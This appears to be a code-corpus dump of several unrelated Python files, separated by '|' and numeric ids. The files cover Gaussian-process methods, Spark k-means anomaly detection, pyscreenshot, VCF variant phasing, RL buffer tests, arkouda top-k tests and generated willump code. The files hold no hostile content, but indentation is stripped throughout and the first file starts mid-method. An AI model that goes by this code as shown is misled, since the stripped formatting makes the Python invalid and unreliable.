"""Stretch a GP.
Args:
p_stretched (:class:`.gp.GP`): Stretched GP.
p (:class:`.gp.GP`): GP to stretch.
stretch (object): Extent of stretch.
Returns:
:class:`.gp.GP`: The stretched GP.
"""
return self._update(
p_stretched,
self.means[p].stretch(stretch),
self.kernels[p].stretch(stretch),
lambda j: self.kernels[p, j].stretch(stretch, 1),
)
def select(self, p_selected, p, *dims):
"""Select input dimensions.
Args:
p_selected (:class:`.gp.GP`): GP with selected inputs.
p (:class:`.gp.GP`): GP to select input dimensions from.
*dims (object): Dimensions to select.
Returns:
:class:`.gp.GP`: GP with the specific input dimensions.
"""
return self._update(
p_selected,
self.means[p].select(dims),
self.kernels[p].select(dims),
lambda j: self.kernels[p, j].select(dims, None),
)
def transform(self, p_transformed, p, f):
"""Transform the inputs of a GP.
Args:
p_transformed (:class:`.gp.GP`): GP with transformed inputs.
p (:class:`.gp.GP`): GP to input transform.
f (function): Input transform.
Returns:
:class:`.gp.GP`: Input-transformed GP.
"""
return self._update(
p_transformed,
self.means[p].transform(f),
self.kernels[p].transform(f),
lambda j: self.kernels[p, j].transform(f, None),
)
def diff(self, p_diff, p, dim=0):
"""Differentiate a GP.
Args:
p_diff (:class:`.gp.GP`): Derivative.
p (:class:`.gp.GP`): GP to differentiate.
dim (int, optional): Dimension of feature which to take the derivative
with respect to. Defaults to `0`.
Returns:
:class:`.gp.GP`: Derivative of GP.
"""
return self._update(
p_diff,
self.means[p].diff(dim),
self.kernels[p].diff(dim),
lambda j: self.kernels[p, j].diff(dim, None),
)
@_dispatch
def condition(self, obs: AbstractObservations):
"""Condition the measure on observations.
Args:
obs (:class:`.observations.AbstractObservations`): Observations to condition on.
Returns:
list[:class:`.gp.GP`]: Posterior processes.
"""
posterior = Measure()
posterior.ps = list(self.ps)
posterior._pids = set(self._pids)
posterior.means.add_rule(posterior._pids, lambda i: obs.posterior_mean(self, i))
posterior.kernels.add_rule(
posterior._pids, lambda i, j: obs.posterior_kernel(self, i, j)
)
# Update backreferences.
for p in posterior.ps:
p._measures.append(posterior)
return posterior
@_dispatch
def condition(self, fdd: FDD, y: B.Numeric):
return self.condition(Observations(fdd, y))
@_dispatch
def condition(self, pair: tuple):
return self.condition(Observations(*pair))
@_dispatch
def condition(self, *pairs: tuple):
return self.condition(Observations(*pairs))
@_dispatch
def __or__(self, *args):
return self.condition(*args)
@_dispatch
def cross(self, p_cross: GP, *ps: GP):
"""Construct the Cartesian product of a collection of processes.
Args:
p_cross (:class:`.gp.GP`): GP that is the Cartesian product.
*ps (:class:`.gp.GP`): Processes to construct the Cartesian product of.
Returns:
:class:`.gp.GP`: The Cartesian product of `ps`.
"""
mok = MOK(self, *ps)
return self._update(
p_cross,
MOM(self, *ps),
mok,
lambda j: mok.transform(None, lambda y: FDD(j, y)),
)
@_dispatch
def sample(self, state: B.RandomState, n: B.Int, *fdds: FDD):
"""Sample multiple processes simultaneously.
Args:
state (random state, optional): Random state.
n (int, optional): Number of samples. Defaults to `1`.
*fdds (:class:`.fdd.FDD`): Locations to sample at.
Returns:
tuple: Tuple of samples.
"""
state, sample = combine(*fdds).sample(state, n)
# Unpack sample.
lengths = [num_elements(fdd) for fdd in fdds]
i, samples = 0, []
for length in lengths:
samples.append(sample[i : i + length, :])
i += length
return (state,) + tuple(samples)
@_dispatch
def sample(self, n: B.Int, *fdds):
res = self.sample(B.global_random_state(fdds), n, *fdds)
state, samples = res[0], res[1:]
B.set_global_random_state(state)
return B.squeeze(samples)
@_dispatch
def sample(self, state: B.RandomState, *fdds: FDD):
return self.sample(state, 1, *fdds)
@_dispatch
def sample(self, *fdds: FDD):
return self.sample(1, *fdds)
@_dispatch
def logpdf(self, *pairs: Union[list, tuple]):
"""Compute the logpdf of one multiple observations.
Can also give an `AbstractObservations`.
Args:
*pairs (tuple[:class:`.fdd.FDD`, tensor]): Pairs of FDDs and values
of the observations.
Returns:
scalar: Logpdf.
"""
fdd, y = combine(*pairs)
return self(fdd).logpdf(y)
@_dispatch
def logpdf(self, fdd: FDD, y: B.Numeric):
return self(fdd).logpdf(y)
@_dispatch
def logpdf(self, obs: Observations):
return self.logpdf(obs.fdd, obs.y)
@_dispatch
def logpdf(self, obs: PseudoObservations):
return obs.elbo(self)
PromisedMeasure.deliver(Measure)
|
1689416
|
import sys
from pyspark.sql import SparkSession
from pyspark.sql.functions import udf
from pyspark.sql.types import *
from pyspark.sql import Row
import operator
from pyspark.mllib.clustering import KMeans
spark = SparkSession.builder \
.master("local") \
.appName("Anomalies Detection") \
.config("spark.some.config.option", "some-value") \
.getOrCreate()
sparkCt = spark.sparkContext
inputs = sys.argv[1]
def to_onehot(lst, indices, unique_values, c):
zs = [0.0]*c
rest_lst = [float(lst[k]) for k in range(len(lst)) if k not in indices]
for pos in indices:
idx = unique_values.index(Row(lst[pos]))
zs[idx] = 1.0
zs.extend(rest_lst)
return zs
class AnomalyDetection():
def readData(self, filename):
self.rawDF = spark.read.parquet(filename).cache()
def cat2Num(self, df, indices):
unique_values = []
for i in indices:
d = udf(lambda r: r[i], StringType())
dt = df.select(d(df.rawFeatures)).distinct().collect()
unique_values.extend(dt)
unique_count = len(unique_values)
convertUDF = udf(lambda r: to_onehot(r, indices, unique_values, unique_count), ArrayType(DoubleType()))
newdf = df.withColumn("features", convertUDF(df.rawFeatures))
return newdf
def addScore(self, df):
cluster_dict = {}
clusters_list = df.select("prediction").collect()
for c in clusters_list:
cluster_dict[c] = cluster_dict.setdefault(c,0.0)+1.0
sorted_clusters = sorted(cluster_dict.items(), key=operator.itemgetter(1)) # sort by value
n_max = sorted_clusters[-1][1]
n_min = sorted_clusters[0][1]
score_udf = udf(lambda p: float(n_max - cluster_dict.get(Row(p)))/(n_max - n_min), DoubleType())
score_df = df.withColumn("score", score_udf(df.prediction))
return score_df
def detect(self, k, t):
# Encoding categorical features using one-hot.
df1 = self.cat2Num(self.rawDF, [0, 1]).cache()
df1.show(n=2, truncate=False)
# Clustering points using KMeans
features = df1.select("features").rdd.map(lambda row: row[0]).cache()
model = KMeans.train(features, k, maxIterations=40, initializationMode="random", seed=20)
# Adding the prediction column to df1
modelBC = sparkCt.broadcast(model)
predictUDF = udf(lambda x: modelBC.value.predict(x), StringType())
df2 = df1.withColumn("prediction", predictUDF(df1.features)).cache()
df2.show(n=3, truncate=False)
# Adding the score column to df2; The higher the score, the more likely it is an anomaly
df3 = self.addScore(df2).cache()
df3.show(n=3, truncate=False)
return df3.where(df3.score > t)
def main():
ad = AnomalyDetection()
ad.readData(inputs)
anomalies = ad.detect(8, 0.97)
anomalies.show()
if __name__ == "__main__":
main()
|
1689440
|
import logging
from pyscreenshot.about import __version__
from pyscreenshot.childproc import childprocess_backend_version
from pyscreenshot.loader import FailedBackendError, backend_dict, backend_grab
ADDITIONAL_IMPORTS = [FailedBackendError]
log = logging.getLogger(__name__)
log.debug("version=%s", __version__)
def grab(bbox=None, childprocess=True, backend=None):
"""Copy the contents of the screen to PIL image memory.
:param bbox: optional bounding box (x1,y1,x2,y2)
:param childprocess: run back-end in new process using popen. (bool)
This isolates back-ends from each other and from main process.
Leave it as it is (True) to have a safe setting.
Set it False to improve performance, but then conflicts are possible.
:param backend: back-end can be forced if set (examples:scrot, wx,..),
otherwise back-end is automatic
"""
if bbox:
x1, y1, x2, y2 = bbox
if x2 <= x1:
raise ValueError("bbox x2<=x1")
if y2 <= y1:
raise ValueError("bbox y2<=y1")
return backend_grab(backend, bbox, childprocess)
def backends():
"""Back-end names as a list.
:return: back-ends as string list
"""
return list(backend_dict.keys())
def backend_version(backend):
"""Back-end version.
:param backend: back-end (examples:scrot, wx,..)
:return: version as string
"""
return childprocess_backend_version(backend)
|
1689442
|
import vcf
import sys
import os
from lib.csq_parser import CsqParser
from Bio.Seq import translate
import lib.run_utils
class ProximalVariant:
#flanking_bases is the number of bases (not amino acids!) to search on each side of a variant position
def __init__(self, proximal_variants_vcf, pass_only, flanking_bases):
if not os.path.exists(proximal_variants_vcf + '.tbi'):
sys.exit('No .tbi file found for proximal variants VCF. Proximal variants VCF needs to be tabix indexed.')
if lib.run_utils.is_gz_file(proximal_variants_vcf):
mode = 'rb'
else:
mode = 'r'
self.fh = open(proximal_variants_vcf, mode)
self.proximal_variants_vcf = vcf.Reader(self.fh)
info_fields = self.proximal_variants_vcf.infos
if 'CSQ' not in info_fields:
sys.exit('Proximal Variants VCF does not contain a CSQ header. Please annotate the VCF with VEP before running it.')
if info_fields['CSQ'] is None:
sys.exit('Failed to extract format string from info description for tag (CSQ)')
self.csq_parser = CsqParser(info_fields['CSQ'].desc)
self.pass_only = pass_only
self.flanking_bases = flanking_bases
def extract(self, somatic_variant, alt, transcript):
(phased_somatic_variant, potential_proximal_variants) = self.find_phased_somatic_variant_and_potential_proximal_variants(somatic_variant, alt, transcript)
if phased_somatic_variant is None:
print("Warning: Main somatic variant not found in phased variants file: {}, {}".format(somatic_variant, alt))
return []
if len(potential_proximal_variants) == 0:
return []
proximal_variants = []
sample = self.proximal_variants_vcf.samples[0]
phased_somatic_variant_genotype = phased_somatic_variant.genotype(sample)
if 'HP' in phased_somatic_variant.FORMAT:
somatic_phasing = phased_somatic_variant_genotype['HP']
for (entry, csq_entry) in potential_proximal_variants:
proximal_variant_genotype = entry.genotype(sample)
#identify variants that are in phase with the phased_somatic_variant
if 'HP' in entry.FORMAT:
proximal_variant_phasing = proximal_variant_genotype['HP']
if proximal_variant_phasing == somatic_phasing:
proximal_variants.append([entry, csq_entry])
#proximal variant is hom var
elif proximal_variant_genotype.is_variant and not proximal_variant_genotype.is_het:
#main somatic variant is het
if phased_somatic_variant_genotype.is_het:
proximal_variants.append([entry, csq_entry])
#main somatic variant is hom var
if phased_somatic_variant_genotype.is_variant and not phased_somatic_variant_genotype.is_het:
proximal_variants.append([entry, csq_entry])
else:
for (entry, csq_entry) in potential_proximal_variants:
proximal_variant_genotype = entry.genotype(sample)
#proximal variant is hom var
if proximal_variant_genotype.is_variant and not proximal_variant_genotype.is_het:
#main somatic variant is het
if phased_somatic_variant_genotype.is_het:
proximal_variants.append([entry, csq_entry])
#main somatic variant is hom var
if phased_somatic_variant_genotype.is_variant and not phased_somatic_variant_genotype.is_het:
proximal_variants.append([entry, csq_entry])
return proximal_variants
def find_phased_somatic_variant_and_potential_proximal_variants(self, somatic_variant, alt, transcript):
potential_proximal_variants = []
phased_somatic_variant = None
for entry in self.proximal_variants_vcf.fetch(somatic_variant.CHROM, somatic_variant.start - self.flanking_bases, somatic_variant.end + self.flanking_bases):
if self.pass_only:
filt = entry.FILTER
if not (filt is None or len(filt) == 0):
continue
for proximal_alt in entry.ALT:
if entry.start == somatic_variant.start and entry.end == somatic_variant.end and proximal_alt == alt:
phased_somatic_variant = entry
continue
if 'CSQ' not in entry.INFO:
print("Warning: Proximal variant is not VEP annotated and will be skipped: {}".format(entry))
continue
alleles_dict = self.csq_parser.resolve_alleles(entry)
csq_entries = self.csq_parser.parse_csq_entries_for_allele(entry.INFO['CSQ'], proximal_alt)
if len(csq_entries) == 0:
csq_allele = alleles_dict[str(proximal_alt)]
csq_entries = self.csq_parser.parse_csq_entries_for_allele(entry.INFO['CSQ'], csq_allele)
if len(csq_entries) == 0:
print("Warning: Proximal variant does not contain any VEP annotations for alternate allele and will be skipped: {}".format(entry))
continue
picked_csq_entry = None
for csq_entry in csq_entries:
if csq_entry['Feature'] == transcript:
picked_csq_entry = csq_entry
if picked_csq_entry is None:
print("Warning: Proximal variant has no transcript annotation for somatic variant of interest transcript {} and will be skipped: {}".format(transcript, entry))
continue
consequences = {consequence.lower() for consequence in picked_csq_entry['Consequence'].split('&')}
if 'missense_variant' not in consequences:
print("Warning: Proximal variant is not a missense mutation and will be skipped: {}".format(entry))
continue
potential_proximal_variants.append([entry, picked_csq_entry])
return (phased_somatic_variant, potential_proximal_variants)
@classmethod
def combine_conflicting_variants(cls, codon_changes):
codon = list(codon_changes[0].split('/')[0].lower())
modified_positions = []
for codon_change in codon_changes:
(old_codon, new_codon) = codon_change.split('/')
change_positions = [i for i in range(len(old_codon)) if old_codon[i] != new_codon[i]]
for position in change_positions:
if position in modified_positions:
print("Warning: position has already been modified")
codon[position] = new_codon[position].lower()
modified_positions.append(position)
return translate("".join(codon))
|
1689461
|
import sys
import os
from selexp import *
def fn2type(x):
c1 = 'CLUSTER_1_ITER'
clust = 'CLUSTER'
grdy = 'GREEDY'
if c1 in x:
return c1
elif clust in x:
return clust
elif grdy in x:
if 'OUTLIERS' in x:
return ('OUTLIERS', float(x.split("OUTLIERS_")[1].split("_")[0]))
return grdy
if 'D2' in x:
return 'D2'
raise RuntimeError("Not Expected: anything else")
def fn2measure(fn):
return sorted(filter(lambda x: x in fn, MEASURES),
key=lambda x: -len(x))[0]
def load_centers(path):
return list(map(int, map(str.strip, open(path))))
def make_table(paths):
assert all(map(os.path.isfile, paths))
raise NotImplementedError("make_table")
def centers2res(ctrs, trueset, samples=None):
if samples is None:
samples = list(range(1, len(ctrs) + 1))
ts = trueset
if not isinstance(ts, set):
ts = set(trueset)
return list(map(lambda x_i: len(ts & set(ctrs[:x_i])), samples)), samples
def getarrs(dat):
arrs = list(map(np.array, dat['res']['scores']))
def gather_data(files, trueset, samples=None):
types, measures, centers = (list(map(f, files)) for f in
(fn2type, fn2measure, load_centers))
trueset = set(trueset)
res = list(map(lambda x: centers2res(x, trueset, samples=samples),
centers))
return {"types": types, "measures": measures, "centers": centers,
"res": {
"scores": res, "samples": samples
}}
|
1689463
|
import unittest
import torch
import torch_testing as tt
from all import nn
from all.core import StateArray
from all.approximation import VNetwork, FeatureNetwork
from all.memory import NStepAdvantageBuffer
class NStepAdvantageBufferTest(unittest.TestCase):
def setUp(self):
torch.manual_seed(1)
self.features = FeatureNetwork(nn.Linear(1, 2), None)
self.v = VNetwork(nn.Linear(2, 1), None)
def _compute_expected_advantages(self, states, returns, next_states, lengths):
return (
returns
+ (0.5 ** lengths.float()) * self.v.eval(self.features.eval(next_states))
- self.v.eval(self.features.eval(states))
)
def test_rollout(self):
buffer = NStepAdvantageBuffer(self.v, self.features, 2, 3, discount_factor=0.5)
actions = torch.ones((3))
states = StateArray(torch.arange(0, 12).unsqueeze(1).float(), (12,))
buffer.store(states[0:3], actions, torch.zeros(3))
buffer.store(states[3:6], actions, torch.ones(3))
states, _, advantages = buffer.advantages(states[6:9])
expected_states = StateArray(torch.arange(0, 6).unsqueeze(1).float(), (6,))
expected_next_states = StateArray(
torch.cat((torch.arange(6, 9), torch.arange(6, 9))).unsqueeze(1).float(), (6,)
)
expected_returns = torch.tensor([
0.5, 0.5, 0.5,
1, 1, 1
]).float()
expected_lengths = torch.tensor([
2., 2, 2,
1, 1, 1
])
self.assert_states_equal(states, expected_states)
tt.assert_allclose(advantages, self._compute_expected_advantages(
expected_states, expected_returns, expected_next_states, expected_lengths
))
def test_rollout_with_dones(self):
buffer = NStepAdvantageBuffer(self.v, self.features, 3, 3, discount_factor=0.5)
done = torch.tensor([False] * 12)
done[5] = True
done[7] = True
done[9] = True
states = StateArray(torch.arange(0, 12).unsqueeze(1).float(), (12,), done=done)
actions = torch.ones((3))
buffer.store(states[0:3], actions, torch.zeros(3))
buffer.store(states[3:6], actions, torch.ones(3))
buffer.store(states[6:9], actions, 2 * torch.ones(3))
states, actions, advantages = buffer.advantages(states[9:12])
expected_states = StateArray(torch.arange(0, 9).unsqueeze(1).float(), (9,), done=done[0:9])
expected_next_done = torch.tensor([True] * 9)
expected_next_done[5] = False
expected_next_done[7] = False
expected_next_done[8] = False
expected_next_states = StateArray(torch.tensor([
9, 7, 5,
9, 7, 11,
9, 10, 11
]).unsqueeze(1).float(), (9,), done=expected_next_done)
expected_returns = torch.tensor([
1, 0.5, 0,
2, 1, 2,
2, 2, 2
]).float()
expected_lengths = torch.tensor([
3, 2, 1,
2, 1, 2,
1, 1, 1
]).float()
self.assert_states_equal(states, expected_states)
tt.assert_allclose(advantages, self._compute_expected_advantages(
expected_states, expected_returns, expected_next_states, expected_lengths
))
def test_multi_rollout(self):
buffer = NStepAdvantageBuffer(self.v, self.features, 2, 2, discount_factor=0.5)
raw_states = StateArray(torch.arange(0, 12).unsqueeze(1).float(), (12,))
actions = torch.ones((2))
buffer.store(raw_states[0:2], actions, torch.ones(2))
buffer.store(raw_states[2:4], actions, torch.ones(2))
states, actions, advantages = buffer.advantages(raw_states[4:6])
expected_states = StateArray(torch.arange(0, 4).unsqueeze(1).float(), (4,))
expected_returns = torch.tensor([1.5, 1.5, 1, 1])
expected_next_states = StateArray(torch.tensor([4., 5, 4, 5]).unsqueeze(1), (4,))
expected_lengths = torch.tensor([2., 2, 1, 1])
self.assert_states_equal(states, expected_states)
tt.assert_allclose(advantages, self._compute_expected_advantages(
expected_states,
expected_returns,
expected_next_states,
expected_lengths
))
buffer.store(raw_states[4:6], actions, torch.ones(2))
buffer.store(raw_states[6:8], actions, torch.ones(2))
states, actions, advantages = buffer.advantages(raw_states[8:10])
expected_states = StateArray(torch.arange(4, 8).unsqueeze(1).float(), (4,))
self.assert_states_equal(states, expected_states)
tt.assert_allclose(advantages, self._compute_expected_advantages(
expected_states,
torch.tensor([1.5, 1.5, 1, 1]),
StateArray(torch.tensor([8, 9, 8, 9]).unsqueeze(1).float(), (4,)),
torch.tensor([2., 2, 1, 1])
))
def assert_array_equal(self, actual, expected):
for i, exp in enumerate(expected):
self.assertEqual(actual[i], exp, msg=(
("\nactual: %s\nexpected: %s") % (actual, expected)))
def assert_states_equal(self, actual, expected):
tt.assert_almost_equal(actual.observation, expected.observation)
tt.assert_equal(actual.mask, expected.mask)
if __name__ == '__main__':
unittest.main()
|
1689468
|
import numpy as np
from context import arkouda as ak
from base_test import ArkoudaTest
SIZE = 10
K = 5
def make_array():
a = ak.randint(0, SIZE, SIZE)
return a
def compare_results(akres, sortedres) -> int:
'''
Compares the numpy and arkouda arrays via the numpy.allclose method with the
default relative and absolute tolerances, returning 0 if the arrays are similar
element-wise within the tolerances, 1 if they are dissimilar.element
:return: 0 (identical) or 1 (dissimilar)
:rtype: int
'''
akres = akres.to_ndarray()
if not np.array_equal(akres, sortedres):
akres = ak.array(akres)
sortedres = ak.array(sortedres)
innp = sortedres[ak.in1d(ak.array(sortedres), ak.array(akres), True)] # values in np array, but not ak array
inak = akres[ak.in1d(ak.array(akres), ak.array(sortedres), True)] # values in ak array, not not np array
print(f"(values in np but not ak: {innp}) (values in ak but not np: {inak})")
return 1
return 0
def run_test(runMin=True, isInd=True, verbose=True):
'''
The run_test method runs execution of the mink reduction
on a randomized array.
:return:
'''
aka = make_array()
failures = 0
try:
if not isInd:
if runMin:
akres = ak.mink(aka, K)
npres = np.sort(aka.to_ndarray())[:K] # first K elements from sorted array
else:
akres = ak.maxk(aka, K)
npres = np.sort(aka.to_ndarray())[-K:] # last K elements from sorted array
else:
if runMin:
akres = aka[ak.argmink(aka, K)]
npres = np.sort(aka.to_ndarray())[:K] # first K elements from sorted array
else:
akres = aka[ak.argmaxk(aka, K)]
npres = np.sort(aka.to_ndarray())[-K:] # last K elements from sorted array
except RuntimeError as E:
if verbose: print("Arkouda error: ", E)
return 1
failures += compare_results(akres, npres)
return failures
class MinKTest(ArkoudaTest):
def test_mink(self):
'''
Executes run_test and asserts whether there are any errors
:return: None
:raise: AssertionError if there are any errors encountered in run_test for set operations
'''
self.assertEqual(0, run_test())
def test_error_handling(self):
testArray = ak.randint(0, 100, 100)
with self.assertRaises(TypeError) as cm:
ak.mink(list(range(0,10)), 1)
self.assertEqual('type of argument "pda" must be arkouda.pdarrayclass.pdarray; got list instead',
cm.exception.args[0])
with self.assertRaises(TypeError) as cm:
ak.mink(testArray, '1')
self.assertEqual('type of argument "k" must be one of (int, int64); got str instead',
cm.exception.args[0])
with self.assertRaises(ValueError) as cm:
ak.mink(testArray, -1)
self.assertEqual("k must be 1 or greater",
cm.exception.args[0])
with self.assertRaises(ValueError) as cm:
ak.mink(ak.array([]), 1)
self.assertEqual("must be a non-empty pdarray of type int or float",
cm.exception.args[0])
class MaxKTest(ArkoudaTest):
def test_maxk(self):
'''
Executes run_test and asserts whether there are any errors
:return: None
:raise: AssertionError if there are any errors encountered in run_test for set operations
'''
self.assertEqual(0, run_test(runMin=False))
def test_error_handling(self):
testArray = ak.randint(0, 100, 100)
with self.assertRaises(TypeError) as cm:
ak.maxk(list(range(0,10)), 1)
self.assertEqual('type of argument "pda" must be arkouda.pdarrayclass.pdarray; got list instead',
cm.exception.args[0])
with self.assertRaises(TypeError) as cm:
ak.maxk(testArray, '1')
self.assertEqual('type of argument "k" must be one of (int, int64); got str instead',
cm.exception.args[0])
with self.assertRaises(ValueError) as cm:
ak.maxk(testArray, -1)
self.assertEqual("k must be 1 or greater",
cm.exception.args[0])
with self.assertRaises(ValueError) as cm:
ak.maxk(ak.array([]), 1)
self.assertEqual("must be a non-empty pdarray of type int or float",
cm.exception.args[0])
class ArgMinKTest(ArkoudaTest):
def test_argmink(self):
'''
Executes run_test and asserts whether there are any errors
:return: None
:raise: AssertionError if there are any errors encountered in run_test for set operations
'''
self.assertEqual(0, run_test(isInd=True))
def test_error_handling(self):
testArray = ak.randint(0, 100, 100)
with self.assertRaises(TypeError) as cm:
ak.argmink(list(range(0,10)), 1)
self.assertEqual('type of argument "pda" must be arkouda.pdarrayclass.pdarray; got list instead',
cm.exception.args[0])
with self.assertRaises(TypeError) as cm:
ak.argmink(testArray, '1')
self.assertEqual('type of argument "k" must be one of (int, int64); got str instead',
cm.exception.args[0])
with self.assertRaises(ValueError) as cm:
ak.argmink(testArray, -1)
self.assertEqual("k must be 1 or greater",
cm.exception.args[0])
with self.assertRaises(ValueError) as cm:
ak.argmink(ak.array([]), 1)
self.assertEqual("must be a non-empty pdarray of type int or float",
cm.exception.args[0])
class ArgMaxKTest(ArkoudaTest):
def test_argmaxk(self):
'''
Executes run_test and asserts whether there are any errors
:return: None
:raise: AssertionError if there are any errors encountered in run_test for set operations
'''
self.assertEqual(0, run_test(runMin=False, isInd=True))
def test_error_handling(self):
testArray = ak.randint(0, 100, 100)
with self.assertRaises(TypeError) as cm:
ak.argmaxk(list(range(0,10)), 1)
self.assertEqual('type of argument "pda" must be arkouda.pdarrayclass.pdarray; got list instead',
cm.exception.args[0])
with self.assertRaises(TypeError) as cm:
ak.argmaxk(testArray, '1')
self.assertEqual('type of argument "k" must be one of (int, int64); got str instead',
cm.exception.args[0])
with self.assertRaises(ValueError) as cm:
ak.argmaxk(testArray, -1)
self.assertEqual("k must be 1 or greater",
cm.exception.args[0])
with self.assertRaises(ValueError) as cm:
ak.argmaxk(ak.array([]), 1)
self.assertEqual("must be a non-empty pdarray of type int or float",
cm.exception.args[0])
|
1689469
|
import argparse
from functools import partial
import gzip
from pathlib import Path
import random
from typing import List
from tqdm import tqdm
def get_random_lines_from_file(filepath, title_line: bool = True,
k: int = 1, N: int = 1) -> List[List]:
open_ = partial(gzip.open, mode='rt') if Path(filepath).suffix == '.gz' else open
with open_(filepath) as fid:
lines = [line for line in tqdm(fid)]
liness = []
for _ in range(N):
if title_line:
lines_ = [lines[0]]
lines_.extend(random.choices(lines[1:], k=k))
else:
lines_ = random.choices(lines, k=k)
liness.append(lines_)
return liness
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--input')
parser.add_argument('--output')
parser.add_argument('--no-title-line', action='store_true', default=False)
parser.add_argument('-k', type=int, default=1)
parser.add_argument('-N', type=int, default=1)
args = parser.parse_args()
print(args, flush=True)
liness = get_random_lines_from_file(
args.input, not args.no_title_line, args.k, args.N
)
for i, lines in enumerate(liness):
with open(f'{args.output}_{i}.csv', 'w') as fid:
fid.writelines(lines)
if __name__ == '__main__':
main()
|
1689498
|
import numpy
import math
from timeit import default_timer as timer
import willump.evaluation.willump_executor
@willump.evaluation.willump_executor.willump_execute()
def process_row(input_numpy_array):
return_numpy_array = numpy.zeros(516)
return_numpy_array[0] = input_numpy_array[68] / math.sqrt(input_numpy_array[68])
return_numpy_array[1] = input_numpy_array[41] / math.sqrt(input_numpy_array[71])
return_numpy_array[2] = input_numpy_array[50] / math.sqrt(input_numpy_array[55])
return_numpy_array[3] = input_numpy_array[78] / math.sqrt(input_numpy_array[82])
return_numpy_array[4] = input_numpy_array[6] / math.sqrt(input_numpy_array[76])
return_numpy_array[5] = input_numpy_array[21] / math.sqrt(input_numpy_array[99])
return_numpy_array[6] = input_numpy_array[15] / math.sqrt(input_numpy_array[73])
return_numpy_array[7] = input_numpy_array[45] / math.sqrt(input_numpy_array[39])
return_numpy_array[8] = input_numpy_array[89] / math.sqrt(input_numpy_array[80])
return_numpy_array[9] = input_numpy_array[21] / math.sqrt(input_numpy_array[27])
return_numpy_array[10] = input_numpy_array[64] / math.sqrt(input_numpy_array[82])
return_numpy_array[11] = input_numpy_array[53] / math.sqrt(input_numpy_array[15])
return_numpy_array[12] = input_numpy_array[15] / math.sqrt(input_numpy_array[95])
return_numpy_array[13] = input_numpy_array[52] / math.sqrt(input_numpy_array[93])
return_numpy_array[14] = input_numpy_array[65] / math.sqrt(input_numpy_array[100])
return_numpy_array[15] = input_numpy_array[47] / math.sqrt(input_numpy_array[19])
return_numpy_array[16] = input_numpy_array[43] / math.sqrt(input_numpy_array[17])
return_numpy_array[17] = input_numpy_array[37] / math.sqrt(input_numpy_array[49])
return_numpy_array[18] = input_numpy_array[17] / math.sqrt(input_numpy_array[85])
return_numpy_array[19] = input_numpy_array[33] / math.sqrt(input_numpy_array[85])
return_numpy_array[20] = input_numpy_array[53] / math.sqrt(input_numpy_array[10])
return_numpy_array[21] = input_numpy_array[50] / math.sqrt(input_numpy_array[12])
return_numpy_array[22] = input_numpy_array[46] / math.sqrt(input_numpy_array[13])
return_numpy_array[23] = input_numpy_array[85] / math.sqrt(input_numpy_array[0])
return_numpy_array[24] = input_numpy_array[31] / math.sqrt(input_numpy_array[84])
return_numpy_array[25] = input_numpy_array[77] / math.sqrt(input_numpy_array[93])
return_numpy_array[26] = input_numpy_array[7] / math.sqrt(input_numpy_array[89])
return_numpy_array[27] = input_numpy_array[62] / math.sqrt(input_numpy_array[31])
return_numpy_array[28] = input_numpy_array[17] / math.sqrt(input_numpy_array[57])
return_numpy_array[29] = input_numpy_array[100] / math.sqrt(input_numpy_array[64])
return_numpy_array[30] = input_numpy_array[74] / math.sqrt(input_numpy_array[83])
return_numpy_array[31] = input_numpy_array[24] / math.sqrt(input_numpy_array[32])
return_numpy_array[32] = input_numpy_array[33] / math.sqrt(input_numpy_array[34])
return_numpy_array[33] = input_numpy_array[25] / math.sqrt(input_numpy_array[9])
return_numpy_array[34] = input_numpy_array[59] / math.sqrt(input_numpy_array[40])
return_numpy_array[35] = input_numpy_array[42] / math.sqrt(input_numpy_array[63])
return_numpy_array[36] = input_numpy_array[41] / math.sqrt(input_numpy_array[78])
return_numpy_array[37] = input_numpy_array[56] / math.sqrt(input_numpy_array[40])
return_numpy_array[38] = input_numpy_array[42] / math.sqrt(input_numpy_array[47])
return_numpy_array[39] = input_numpy_array[33] / math.sqrt(input_numpy_array[8])
return_numpy_array[40] = input_numpy_array[16] / math.sqrt(input_numpy_array[15])
return_numpy_array[41] = input_numpy_array[93] / math.sqrt(input_numpy_array[52])
return_numpy_array[42] = input_numpy_array[44] / math.sqrt(input_numpy_array[57])
return_numpy_array[43] = input_numpy_array[16] / math.sqrt(input_numpy_array[39])
return_numpy_array[44] = input_numpy_array[19] / math.sqrt(input_numpy_array[65])
return_numpy_array[45] = input_numpy_array[59] / math.sqrt(input_numpy_array[40])
return_numpy_array[46] = input_numpy_array[32] / math.sqrt(input_numpy_array[59])
return_numpy_array[47] = input_numpy_array[76] / math.sqrt(input_numpy_array[71])
return_numpy_array[48] = input_numpy_array[34] / math.sqrt(input_numpy_array[56])
return_numpy_array[49] = input_numpy_array[67] / math.sqrt(input_numpy_array[10])
return_numpy_array[50] = input_numpy_array[32] / math.sqrt(input_numpy_array[45])
return_numpy_array[51] = input_numpy_array[29] / math.sqrt(input_numpy_array[83])
return_numpy_array[52] = input_numpy_array[37] / math.sqrt(input_numpy_array[56])
return_numpy_array[53] = input_numpy_array[94] / math.sqrt(input_numpy_array[67])
return_numpy_array[54] = input_numpy_array[64] / math.sqrt(input_numpy_array[78])
return_numpy_array[55] = input_numpy_array[20] / math.sqrt(input_numpy_array[68])
return_numpy_array[56] = input_numpy_array[10] / math.sqrt(input_numpy_array[10])
return_numpy_array[57] = input_numpy_array[93] / math.sqrt(input_numpy_array[12])
return_numpy_array[58] = input_numpy_array[56] / math.sqrt(input_numpy_array[7])
return_numpy_array[59] = input_numpy_array[93] / math.sqrt(input_numpy_array[100])
return_numpy_array[60] = input_numpy_array[78] / math.sqrt(input_numpy_array[83])
return_numpy_array[61] = input_numpy_array[37] / math.sqrt(input_numpy_array[61])
return_numpy_array[62] = input_numpy_array[61] / math.sqrt(input_numpy_array[58])
return_numpy_array[63] = input_numpy_array[72] / math.sqrt(input_numpy_array[61])
return_numpy_array[64] = input_numpy_array[67] / math.sqrt(input_numpy_array[70])
return_numpy_array[65] = input_numpy_array[59] / math.sqrt(input_numpy_array[75])
return_numpy_array[66] = input_numpy_array[45] / math.sqrt(input_numpy_array[38])
return_numpy_array[67] = input_numpy_array[56] / math.sqrt(input_numpy_array[71])
return_numpy_array[68] = input_numpy_array[3] / math.sqrt(input_numpy_array[69])
return_numpy_array[69] = input_numpy_array[5] / math.sqrt(input_numpy_array[38])
return_numpy_array[70] = input_numpy_array[91] / math.sqrt(input_numpy_array[84])
return_numpy_array[71] = input_numpy_array[0] / math.sqrt(input_numpy_array[87])
return_numpy_array[72] = input_numpy_array[99] / math.sqrt(input_numpy_array[98])
